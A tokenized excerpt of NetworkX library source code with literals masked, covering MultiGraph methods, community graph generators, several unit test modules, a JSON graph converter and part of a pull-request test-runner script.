get ( weight , <NUM_LIT:1> ) <EOL> for data in nbrs . values ( ) <EOL> for d in data . values ( ) ] ) <EOL> if n in nbrs : <EOL> deg += sum ( [ d . get ( weight , <NUM_LIT:1> ) <EOL> for key , d in nbrs [ n ] . items ( ) ] ) <EOL> yield ( n , deg ) <EOL> return d_iter ( ) <EOL> def is_multigraph ( self ) : <EOL> """<STR_LIT>""" <EOL> return True <EOL> def is_directed ( self ) : <EOL> """<STR_LIT>""" <EOL> return False <EOL> def to_directed ( self ) : <EOL> """<STR_LIT>""" <EOL> from networkx . classes . multidigraph import MultiDiGraph <EOL> G = MultiDiGraph ( ) <EOL> G . add_nodes_from ( self ) <EOL> G . add_edges_from ( ( u , v , key , deepcopy ( datadict ) ) <EOL> for u , nbrs in self . adjacency ( ) <EOL> for v , keydict in nbrs . items ( ) <EOL> for key , datadict in keydict . items ( ) ) <EOL> G . graph = deepcopy ( self . graph ) <EOL> G . node = deepcopy ( self . node ) <EOL> return G <EOL> def selfloop_edges ( self , data = False , keys = False , default = None ) : <EOL> """<STR_LIT>""" <EOL> if data is True : <EOL> if keys : <EOL> return ( ( n , n , k , d ) <EOL> for n , nbrs in self . adj . items ( ) <EOL> if n in nbrs for k , d in nbrs [ n ] . items ( ) ) <EOL> else : <EOL> return ( ( n , n , d ) <EOL> for n , nbrs in self . adj . items ( ) <EOL> if n in nbrs for d in nbrs [ n ] . values ( ) ) <EOL> elif data is not False : <EOL> if keys : <EOL> return ( ( n , n , k , d . get ( data , default ) ) <EOL> for n , nbrs in self . adj . items ( ) <EOL> if n in nbrs for k , d in nbrs [ n ] . items ( ) ) <EOL> else : <EOL> return ( ( n , n , d . get ( data , default ) ) <EOL> for n , nbrs in self . adj . items ( ) <EOL> if n in nbrs for d in nbrs [ n ] . values ( ) ) <EOL> else : <EOL> if keys : <EOL> return ( ( n , n , k ) <EOL> for n , nbrs in self . adj . items ( ) <EOL> if n in nbrs for k in nbrs [ n ] . keys ( ) ) <EOL> else : <EOL> return ( ( n , n ) <EOL> for n , nbrs in self . adj . items ( ) <EOL> if n in nbrs for d in nbrs [ n ] . 
values ( ) ) <EOL> def number_of_edges ( self , u = None , v = None ) : <EOL> """<STR_LIT>""" <EOL> if u is None : return self . size ( ) <EOL> try : <EOL> edgedata = self . adj [ u ] [ v ] <EOL> except KeyError : <EOL> return <NUM_LIT:0> <EOL> return len ( edgedata ) <EOL> def subgraph ( self , nbunch ) : <EOL> """<STR_LIT>""" <EOL> bunch = self . nbunch_iter ( nbunch ) <EOL> H = self . __class__ ( ) <EOL> for n in bunch : <EOL> H . node [ n ] = self . node [ n ] <EOL> H_adj = H . adj <EOL> self_adj = self . adj <EOL> for n in H : <EOL> Hnbrs = H . adjlist_dict_factory ( ) <EOL> H_adj [ n ] = Hnbrs <EOL> for nbr , edgedict in self_adj [ n ] . items ( ) : <EOL> if nbr in H_adj : <EOL> ed = edgedict . copy ( ) <EOL> Hnbrs [ nbr ] = ed <EOL> H_adj [ nbr ] [ n ] = ed <EOL> H . graph = self . graph <EOL> return H <EOL> def edge_subgraph ( self , edges ) : <EOL> """<STR_LIT>""" <EOL> H = self . __class__ ( ) <EOL> adj = self . adj <EOL> def is_in_graph ( u , v , k ) : <EOL> return u in adj and v in adj [ u ] and k in adj [ u ] [ v ] <EOL> edges = ( e for e in edges if is_in_graph ( * e ) ) <EOL> for u , v , k in edges : <EOL> if u not in H . node : <EOL> H . node [ u ] = self . node [ u ] <EOL> if v not in H . node : <EOL> H . node [ v ] = self . node [ v ] <EOL> if u not in H . adj : <EOL> H . adj [ u ] = H . adjlist_dict_factory ( ) <EOL> if v not in H . adj : <EOL> H . adj [ v ] = H . adjlist_dict_factory ( ) <EOL> if v not in H . adj [ u ] : <EOL> H . adj [ u ] [ v ] = H . edge_key_dict_factory ( ) <EOL> if u not in H . adj [ v ] : <EOL> H . adj [ v ] [ u ] = H . edge_key_dict_factory ( ) <EOL> H . edge [ u ] [ v ] [ k ] = self . edge [ u ] [ v ] [ k ] <EOL> H . edge [ v ] [ u ] [ k ] = self . edge [ v ] [ u ] [ k ] <EOL> H . graph = self . graph <EOL> return H </s>
<s> """<STR_LIT>""" <EOL> import itertools <EOL> import math <EOL> import random <EOL> import networkx as nx <EOL> __author__ = """<STR_LIT:\n>""" . join ( [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ] ) <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> def caveman_graph ( l , k ) : <EOL> """<STR_LIT>""" <EOL> G = nx . empty_graph ( l * k ) <EOL> G . name = "<STR_LIT>" % ( l * k , k ) <EOL> if k > <NUM_LIT:1> : <EOL> for start in range ( <NUM_LIT:0> , l * k , k ) : <EOL> edges = itertools . combinations ( range ( start , start + k ) , <NUM_LIT:2> ) <EOL> G . add_edges_from ( edges ) <EOL> return G <EOL> def connected_caveman_graph ( l , k ) : <EOL> """<STR_LIT>""" <EOL> G = nx . caveman_graph ( l , k ) <EOL> G . name = "<STR_LIT>" % ( l , k ) <EOL> for start in range ( <NUM_LIT:0> , l * k , k ) : <EOL> G . remove_edge ( start , start + <NUM_LIT:1> ) <EOL> G . add_edge ( start , ( start - <NUM_LIT:1> ) % ( l * k ) ) <EOL> return G <EOL> def relaxed_caveman_graph ( l , k , p , seed = None ) : <EOL> """<STR_LIT>""" <EOL> if not seed is None : <EOL> random . seed ( seed ) <EOL> G = nx . caveman_graph ( l , k ) <EOL> nodes = list ( G ) <EOL> G . name = "<STR_LIT>" % ( l , k , p ) <EOL> for ( u , v ) in G . edges ( ) : <EOL> if random . random ( ) < p : <EOL> x = random . choice ( nodes ) <EOL> if G . has_edge ( u , x ) : <EOL> continue <EOL> G . remove_edge ( u , v ) <EOL> G . add_edge ( u , x ) <EOL> return G <EOL> def random_partition_graph ( sizes , p_in , p_out , seed = None , directed = False ) : <EOL> """<STR_LIT>""" <EOL> if not seed is None : <EOL> random . seed ( seed ) <EOL> if not <NUM_LIT:0.0> <= p_in <= <NUM_LIT:1.0> : <EOL> raise nx . NetworkXError ( "<STR_LIT>" ) <EOL> if not <NUM_LIT:0.0> <= p_out <= <NUM_LIT:1.0> : <EOL> raise nx . NetworkXError ( "<STR_LIT>" ) <EOL> if directed : <EOL> G = nx . DiGraph ( ) <EOL> else : <EOL> G = nx . 
Graph ( ) <EOL> G . graph [ '<STR_LIT>' ] = [ ] <EOL> n = sum ( sizes ) <EOL> G . add_nodes_from ( range ( n ) ) <EOL> next_group = { } <EOL> start = <NUM_LIT:0> <EOL> group = <NUM_LIT:0> <EOL> for n in sizes : <EOL> edges = ( ( u + start , v + start ) <EOL> for u , v in <EOL> nx . fast_gnp_random_graph ( n , p_in , directed = directed ) . edges ( ) ) <EOL> G . add_edges_from ( edges ) <EOL> next_group . update ( dict . fromkeys ( range ( start , start + n ) , start + n ) ) <EOL> G . graph [ '<STR_LIT>' ] . append ( set ( range ( start , start + n ) ) ) <EOL> group += <NUM_LIT:1> <EOL> start += n <EOL> if p_out == <NUM_LIT:0> : <EOL> return G <EOL> if p_out == <NUM_LIT:1> : <EOL> for n in next_group : <EOL> targets = range ( next_group [ n ] , len ( G ) ) <EOL> G . add_edges_from ( zip ( [ n ] * len ( targets ) , targets ) ) <EOL> if directed : <EOL> G . add_edges_from ( zip ( targets , [ n ] * len ( targets ) ) ) <EOL> return G <EOL> lp = math . log ( <NUM_LIT:1.0> - p_out ) <EOL> n = len ( G ) <EOL> if directed : <EOL> for u in range ( n ) : <EOL> v = <NUM_LIT:0> <EOL> while v < n : <EOL> lr = math . log ( <NUM_LIT:1.0> - random . random ( ) ) <EOL> v += int ( lr / lp ) <EOL> if next_group . get ( v , n ) == next_group [ u ] : <EOL> v = next_group [ u ] <EOL> if v < n : <EOL> G . add_edge ( u , v ) <EOL> v += <NUM_LIT:1> <EOL> else : <EOL> for u in range ( n - <NUM_LIT:1> ) : <EOL> v = next_group [ u ] <EOL> while v < n : <EOL> lr = math . log ( <NUM_LIT:1.0> - random . random ( ) ) <EOL> v += int ( lr / lp ) <EOL> if v < n : <EOL> G . add_edge ( u , v ) <EOL> v += <NUM_LIT:1> <EOL> return G <EOL> def planted_partition_graph ( l , k , p_in , p_out , seed = None , directed = False ) : <EOL> """<STR_LIT>""" <EOL> return random_partition_graph ( [ k ] * l , p_in , p_out , seed , directed ) <EOL> def gaussian_random_partition_graph ( n , s , v , p_in , p_out , directed = False , <EOL> seed = None ) : <EOL> """<STR_LIT>""" <EOL> if s > n : <EOL> raise nx . 
NetworkXError ( "<STR_LIT>" ) <EOL> assigned = <NUM_LIT:0> <EOL> sizes = [ ] <EOL> while True : <EOL> size = int ( random . normalvariate ( s , float ( s ) / v + <NUM_LIT:0.5> ) ) <EOL> if size < <NUM_LIT:1> : <EOL> continue <EOL> if assigned + size >= n : <EOL> sizes . append ( n - assigned ) <EOL> break <EOL> assigned += size <EOL> sizes . append ( size ) <EOL> return random_partition_graph ( sizes , p_in , p_out , directed , seed ) <EOL> def ring_of_cliques ( num_cliques , clique_size ) : <EOL> """<STR_LIT>""" <EOL> if num_cliques < <NUM_LIT:2> : <EOL> raise nx . NetworkXError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if clique_size < <NUM_LIT:2> : <EOL> raise nx . NetworkXError ( '<STR_LIT>' ) <EOL> G = nx . Graph ( ) <EOL> for i in range ( num_cliques ) : <EOL> edges = itertools . combinations ( range ( i * clique_size , i * clique_size + <EOL> clique_size ) , <NUM_LIT:2> ) <EOL> G . add_edges_from ( edges ) <EOL> G . add_edge ( i * clique_size + <NUM_LIT:1> , ( i + <NUM_LIT:1> ) * clique_size % <EOL> ( num_cliques * clique_size ) ) <EOL> return G </s>
<s> """<STR_LIT>""" <EOL> from nose . tools import * <EOL> from networkx import * <EOL> class TestGeneratorNonIsomorphicTrees ( ) : <EOL> def test_tree_structure ( self ) : <EOL> f = lambda x : list ( nx . nonisomorphic_trees ( x ) ) <EOL> for i in f ( <NUM_LIT:6> ) : <EOL> assert_true ( nx . is_tree ( i ) ) <EOL> for i in f ( <NUM_LIT:8> ) : <EOL> assert_true ( nx . is_tree ( i ) ) <EOL> def test_nonisomorphism ( self ) : <EOL> f = lambda x : list ( nx . nonisomorphic_trees ( x ) ) <EOL> trees = f ( <NUM_LIT:6> ) <EOL> for i in range ( len ( trees ) ) : <EOL> for j in range ( i + <NUM_LIT:1> , len ( trees ) ) : <EOL> assert_false ( nx . is_isomorphic ( trees [ i ] , trees [ j ] ) ) <EOL> trees = f ( <NUM_LIT:8> ) <EOL> for i in range ( len ( trees ) ) : <EOL> for j in range ( i + <NUM_LIT:1> , len ( trees ) ) : <EOL> assert_false ( nx . is_isomorphic ( trees [ i ] , trees [ j ] ) ) <EOL> def test_number_of_nonisomorphic_trees ( self ) : <EOL> assert_equal ( nx . number_of_nonisomorphic_trees ( <NUM_LIT:2> ) , <NUM_LIT:1> ) <EOL> assert_equal ( nx . number_of_nonisomorphic_trees ( <NUM_LIT:3> ) , <NUM_LIT:1> ) <EOL> assert_equal ( nx . number_of_nonisomorphic_trees ( <NUM_LIT:4> ) , <NUM_LIT:2> ) <EOL> assert_equal ( nx . number_of_nonisomorphic_trees ( <NUM_LIT:5> ) , <NUM_LIT:3> ) <EOL> assert_equal ( nx . number_of_nonisomorphic_trees ( <NUM_LIT:6> ) , <NUM_LIT:6> ) <EOL> assert_equal ( nx . number_of_nonisomorphic_trees ( <NUM_LIT:7> ) , <NUM_LIT:11> ) <EOL> assert_equal ( nx . number_of_nonisomorphic_trees ( <NUM_LIT:8> ) , <NUM_LIT> ) <EOL> def test_nonisomorphic_trees ( self ) : <EOL> f = lambda x : list ( nx . nonisomorphic_trees ( x ) ) <EOL> assert_equal ( sorted ( f ( <NUM_LIT:3> ) [ <NUM_LIT:0> ] . edges ( ) ) , [ ( <NUM_LIT:0> , <NUM_LIT:1> ) , ( <NUM_LIT:0> , <NUM_LIT:2> ) ] ) <EOL> assert_equal ( sorted ( f ( <NUM_LIT:4> ) [ <NUM_LIT:0> ] . 
edges ( ) ) , [ ( <NUM_LIT:0> , <NUM_LIT:1> ) , ( <NUM_LIT:0> , <NUM_LIT:3> ) , ( <NUM_LIT:1> , <NUM_LIT:2> ) ] ) <EOL> assert_equal ( sorted ( f ( <NUM_LIT:4> ) [ <NUM_LIT:1> ] . edges ( ) ) , [ ( <NUM_LIT:0> , <NUM_LIT:1> ) , ( <NUM_LIT:0> , <NUM_LIT:2> ) , ( <NUM_LIT:0> , <NUM_LIT:3> ) ] ) <EOL> def test_nonisomorphic_trees_matrix ( self ) : <EOL> trees_2 = [ [ [ <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:0> ] ] ] <EOL> assert_equal ( list ( nx . nonisomorphic_trees ( <NUM_LIT:2> , create = "<STR_LIT>" ) ) , trees_2 ) <EOL> trees_3 = [ [ [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ] , [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ] ] ] <EOL> assert_equal ( list ( nx . nonisomorphic_trees ( <NUM_LIT:3> , create = "<STR_LIT>" ) ) , trees_3 ) <EOL> trees_4 = [ [ [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ] , [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ] , <EOL> [ [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ] ] <EOL> assert_equal ( list ( nx . nonisomorphic_trees ( <NUM_LIT:4> , create = "<STR_LIT>" ) ) , trees_4 ) </s>
<s> """<STR_LIT>""" <EOL> import json <EOL> import networkx as nx <EOL> from networkx . utils . decorators import not_implemented_for <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def jit_graph ( data ) : <EOL> """<STR_LIT>""" <EOL> G = nx . Graph ( ) <EOL> for node in data : <EOL> G . add_node ( node [ '<STR_LIT:id>' ] , ** node [ '<STR_LIT:data>' ] ) <EOL> if node . get ( '<STR_LIT>' ) is not None : <EOL> for adj in node [ '<STR_LIT>' ] : <EOL> G . add_edge ( node [ '<STR_LIT:id>' ] , adj [ '<STR_LIT>' ] , ** adj [ '<STR_LIT:data>' ] ) <EOL> return G <EOL> @ not_implemented_for ( '<STR_LIT>' ) <EOL> def jit_data ( G , indent = None ) : <EOL> """<STR_LIT>""" <EOL> json_graph = [ ] <EOL> for node in G . nodes ( ) : <EOL> json_node = { <EOL> "<STR_LIT:id>" : node , <EOL> "<STR_LIT:name>" : node <EOL> } <EOL> json_node [ "<STR_LIT:data>" ] = G . node [ node ] <EOL> if G [ node ] : <EOL> json_node [ "<STR_LIT>" ] = [ ] <EOL> for neighbour in G [ node ] : <EOL> adjacency = { <EOL> "<STR_LIT>" : neighbour , <EOL> } <EOL> adjacency [ "<STR_LIT:data>" ] = G . edge [ node ] [ neighbour ] <EOL> json_node [ "<STR_LIT>" ] . append ( adjacency ) <EOL> json_graph . append ( json_node ) <EOL> return json . dumps ( json_graph , indent = indent ) </s>
<s> from nose . tools import * <EOL> import networkx as nx <EOL> from networkx . testing import * <EOL> class _GenericTest ( object ) : <EOL> def _test_equal ( self , a , b ) : <EOL> self . _assert_func ( a , b ) <EOL> def _test_not_equal ( self , a , b ) : <EOL> try : <EOL> self . _assert_func ( a , b ) <EOL> passed = True <EOL> except AssertionError : <EOL> pass <EOL> else : <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> class TestNodesEqual ( _GenericTest ) : <EOL> def setUp ( self ) : <EOL> self . _assert_func = assert_nodes_equal <EOL> def test_nodes_equal ( self ) : <EOL> a = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:5> , <NUM_LIT:4> ] <EOL> b = [ <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:1> , <NUM_LIT:2> ] <EOL> self . _test_equal ( a , b ) <EOL> def test_nodes_not_equal ( self ) : <EOL> a = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:5> , <NUM_LIT:4> ] <EOL> b = [ <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:1> , <NUM_LIT:3> ] <EOL> self . _test_not_equal ( a , b ) <EOL> def test_nodes_with_data_equal ( self ) : <EOL> G = nx . Graph ( ) <EOL> G . add_nodes_from ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , color = '<STR_LIT>' ) <EOL> H = nx . Graph ( ) <EOL> H . add_nodes_from ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , color = '<STR_LIT>' ) <EOL> self . _test_equal ( G . nodes ( data = True ) , H . nodes ( data = True ) ) <EOL> def test_edges_with_data_not_equal ( self ) : <EOL> G = nx . Graph ( ) <EOL> G . add_nodes_from ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , color = '<STR_LIT>' ) <EOL> H = nx . Graph ( ) <EOL> H . add_nodes_from ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , color = '<STR_LIT>' ) <EOL> self . _test_not_equal ( G . nodes ( data = True ) , H . nodes ( data = True ) ) <EOL> class TestEdgesEqual ( _GenericTest ) : <EOL> def setUp ( self ) : <EOL> self . 
_assert_func = assert_edges_equal <EOL> def test_edges_equal ( self ) : <EOL> a = [ ( <NUM_LIT:1> , <NUM_LIT:2> ) , ( <NUM_LIT:5> , <NUM_LIT:4> ) ] <EOL> b = [ ( <NUM_LIT:4> , <NUM_LIT:5> ) , ( <NUM_LIT:1> , <NUM_LIT:2> ) ] <EOL> self . _test_equal ( a , b ) <EOL> def test_edges_not_equal ( self ) : <EOL> a = [ ( <NUM_LIT:1> , <NUM_LIT:2> ) , ( <NUM_LIT:5> , <NUM_LIT:4> ) ] <EOL> b = [ ( <NUM_LIT:4> , <NUM_LIT:5> ) , ( <NUM_LIT:1> , <NUM_LIT:3> ) ] <EOL> self . _test_not_equal ( a , b ) <EOL> def test_edges_with_data_equal ( self ) : <EOL> G = nx . MultiGraph ( ) <EOL> nx . add_path ( G , [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] , weight = <NUM_LIT:1> ) <EOL> H = nx . MultiGraph ( ) <EOL> nx . add_path ( H , [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] , weight = <NUM_LIT:1> ) <EOL> self . _test_equal ( G . edges ( data = True , keys = True ) , <EOL> H . edges ( data = True , keys = True ) ) <EOL> def test_edges_with_data_not_equal ( self ) : <EOL> G = nx . MultiGraph ( ) <EOL> nx . add_path ( G , [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] , weight = <NUM_LIT:1> ) <EOL> H = nx . MultiGraph ( ) <EOL> nx . add_path ( H , [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] , weight = <NUM_LIT:2> ) <EOL> self . _test_not_equal ( G . edges ( data = True , keys = True ) , <EOL> H . edges ( data = True , keys = True ) ) <EOL> def test_no_edges ( self ) : <EOL> G = nx . MultiGraph ( ) <EOL> H = nx . MultiGraph ( ) <EOL> self . _test_equal ( G . edges ( data = True , keys = True ) , <EOL> H . edges ( data = True , keys = True ) ) <EOL> def test_duplicate_edges ( self ) : <EOL> a = [ ( <NUM_LIT:1> , <NUM_LIT:2> ) , ( <NUM_LIT:5> , <NUM_LIT:4> ) , ( <NUM_LIT:1> , <NUM_LIT:2> ) ] <EOL> b = [ ( <NUM_LIT:4> , <NUM_LIT:5> ) , ( <NUM_LIT:1> , <NUM_LIT:2> ) ] <EOL> self . _test_not_equal ( a , b ) <EOL> class TestGraphsEqual ( _GenericTest ) : <EOL> def setUp ( self ) : <EOL> self . _assert_func = assert_graphs_equal <EOL> def test_graphs_equal ( self ) : <EOL> G = nx . 
path_graph ( <NUM_LIT:4> ) <EOL> H = nx . Graph ( ) <EOL> nx . add_path ( H , range ( <NUM_LIT:4> ) ) <EOL> H . name = '<STR_LIT>' <EOL> self . _test_equal ( G , H ) <EOL> def test_digraphs_equal ( self ) : <EOL> G = nx . path_graph ( <NUM_LIT:4> , create_using = nx . DiGraph ( ) ) <EOL> H = nx . DiGraph ( ) <EOL> nx . add_path ( H , range ( <NUM_LIT:4> ) ) <EOL> H . name = '<STR_LIT>' <EOL> self . _test_equal ( G , H ) <EOL> def test_multigraphs_equal ( self ) : <EOL> G = nx . path_graph ( <NUM_LIT:4> , create_using = nx . MultiGraph ( ) ) <EOL> H = nx . MultiGraph ( ) <EOL> nx . add_path ( H , range ( <NUM_LIT:4> ) ) <EOL> H . name = '<STR_LIT>' <EOL> self . _test_equal ( G , H ) <EOL> def test_multigraphs_equal ( self ) : <EOL> G = nx . path_graph ( <NUM_LIT:4> , create_using = nx . MultiDiGraph ( ) ) <EOL> H = nx . MultiDiGraph ( ) <EOL> nx . add_path ( H , range ( <NUM_LIT:4> ) ) <EOL> H . name = '<STR_LIT>' <EOL> self . _test_equal ( G , H ) <EOL> def test_graphs_not_equal ( self ) : <EOL> G = nx . path_graph ( <NUM_LIT:4> ) <EOL> H = nx . Graph ( ) <EOL> nx . add_cycle ( H , range ( <NUM_LIT:4> ) ) <EOL> self . _test_not_equal ( G , H ) <EOL> def test_graphs_not_equal2 ( self ) : <EOL> G = nx . path_graph ( <NUM_LIT:4> ) <EOL> H = nx . Graph ( ) <EOL> nx . add_path ( H , range ( <NUM_LIT:3> ) ) <EOL> H . name = '<STR_LIT>' <EOL> self . _test_not_equal ( G , H ) <EOL> def test_graphs_not_equal3 ( self ) : <EOL> G = nx . path_graph ( <NUM_LIT:4> ) <EOL> H = nx . Graph ( ) <EOL> nx . add_path ( H , range ( <NUM_LIT:4> ) ) <EOL> H . name = '<STR_LIT>' <EOL> self . _test_not_equal ( G , H ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> import errno <EOL> from glob import glob <EOL> import io <EOL> import json <EOL> import os <EOL> import pickle <EOL> import re <EOL> import requests <EOL> import shutil <EOL> import time <EOL> from subprocess import call , check_call , check_output , PIPE , STDOUT , CalledProcessError <EOL> import sys <EOL> import gh_api <EOL> from gh_api import Obj <EOL> basedir = os . path . join ( os . path . expanduser ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> repodir = os . path . join ( basedir , "<STR_LIT>" ) <EOL> nx_repository = '<STR_LIT>' <EOL> nx_http_repository = '<STR_LIT>' <EOL> gh_project = "<STR_LIT>" <EOL> supported_pythons = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> missing_libs_re = re . compile ( '<STR_LIT>' ) <EOL> def get_missing_libraries ( log ) : <EOL> libs = set ( ) <EOL> for line in log . split ( '<STR_LIT:\n>' ) : <EOL> m = missing_libs_re . search ( line ) <EOL> if m : <EOL> libs . add ( m . group ( <NUM_LIT:1> ) . lower ( ) ) <EOL> if libs : <EOL> return "<STR_LIT:U+002CU+0020>" . join ( libs ) <EOL> skipped_re = re . compile ( '<STR_LIT>' ) <EOL> def get_skipped ( log ) : <EOL> m = skipped_re . search ( log ) <EOL> if m : <EOL> return m . group ( <NUM_LIT:1> ) <EOL> number_tests_re = re . compile ( '<STR_LIT>' ) <EOL> def get_number_tests ( log ) : <EOL> m = number_tests_re . search ( log ) <EOL> if m : <EOL> return m . group ( <NUM_LIT:1> ) <EOL> class TestRun ( object ) : <EOL> def __init__ ( self , pr_num ) : <EOL> self . unavailable_pythons = [ ] <EOL> self . venvs = [ ] <EOL> self . pr_num = pr_num <EOL> self . pr = gh_api . get_pull_request ( gh_project , pr_num ) <EOL> self . setup ( ) <EOL> self . 
results = [ ] <EOL> def available_python_versions ( self ) : <EOL> """<STR_LIT>""" <EOL> for py in supported_pythons : <EOL> try : <EOL> check_call ( [ py , '<STR_LIT:-c>' , '<STR_LIT>' ] , stdout = PIPE ) <EOL> yield py <EOL> except ( OSError , CalledProcessError ) : <EOL> self . unavailable_pythons . append ( py ) <EOL> def setup ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> os . mkdir ( basedir ) <EOL> except OSError as e : <EOL> if e . errno != errno . EEXIST : <EOL> raise <EOL> os . chdir ( basedir ) <EOL> for venv in glob ( '<STR_LIT>' ) : <EOL> shutil . rmtree ( venv ) <EOL> for py in self . available_python_versions ( ) : <EOL> check_call ( [ '<STR_LIT>' , '<STR_LIT>' , py , <EOL> '<STR_LIT>' , '<STR_LIT>' % py ] ) <EOL> self . venvs . append ( ( py , '<STR_LIT>' % py ) ) <EOL> if not os . path . exists ( '<STR_LIT>' ) : <EOL> try : <EOL> check_call ( [ '<STR_LIT>' , '<STR_LIT>' , nx_repository ] ) <EOL> except CalledProcessError : <EOL> check_call ( [ '<STR_LIT>' , '<STR_LIT>' , nx_http_repository ] ) <EOL> os . chdir ( repodir ) <EOL> check_call ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> try : <EOL> check_call ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> except CalledProcessError : <EOL> check_call ( [ '<STR_LIT>' , '<STR_LIT>' , nx_http_repository , '<STR_LIT>' ] ) <EOL> self . master_sha = check_output ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) . decode ( '<STR_LIT:ascii>' ) . strip ( ) <EOL> os . chdir ( basedir ) <EOL> def get_branch ( self ) : <EOL> repo = self . pr [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> branch = self . pr [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> owner = self . pr [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> mergeable = self . pr [ '<STR_LIT>' ] <EOL> os . 
chdir ( repodir ) <EOL> if mergeable : <EOL> merged_branch = "<STR_LIT>" % ( owner , branch ) <EOL> call ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , merged_branch ] ) <EOL> check_call ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , merged_branch ] ) <EOL> check_call ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , repo , branch ] ) <EOL> check_call ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , "<STR_LIT>" % ( repo , branch ) ] ) <EOL> else : <EOL> check_call ( [ '<STR_LIT>' , '<STR_LIT>' , repo , branch ] ) <EOL> check_call ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> os . chdir ( basedir ) <EOL> def markdown_format ( self ) : <EOL> def format_result ( result ) : <EOL> s = "<STR_LIT>" % result . py <EOL> if result . passed : <EOL> s += "<STR_LIT>" % ( ok , result . skipped , result . num_tests ) <EOL> else : <EOL> s += "<STR_LIT>" % ( fail , result . log_url ) <EOL> if result . missing_libraries : <EOL> s += "<STR_LIT>" + result . missing_libraries + "<STR_LIT:)>" <EOL> return s <EOL> pr_num = self . pr_num <EOL> branch = self . pr [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> branch_url = self . pr [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] + '<STR_LIT>' + branch <EOL> owner = self . pr [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> mergeable = self . pr [ '<STR_LIT>' ] <EOL> master_sha = self . master_sha <EOL> branch_sha = self . pr [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ : <NUM_LIT:7> ] <EOL> ok = '<STR_LIT>' <EOL> fail = '<STR_LIT>' <EOL> header = "<STR_LIT>" % pr_num <EOL> header += "<STR_LIT>" % ( owner , branch , branch_url ) <EOL> if mergeable : <EOL> mrg = "<STR_LIT>" % ok <EOL> else : <EOL> mrg = "<STR_LIT>" % fail <EOL> mrg += "<STR_LIT>" % ( branch_sha , master_sha ) <EOL> lines = [ header , <EOL> mrg , <EOL> "<STR_LIT>" + sys . platform , <EOL> "<STR_LIT>" ] + [ format_result ( r ) for r in self . results ] <EOL> if self . 
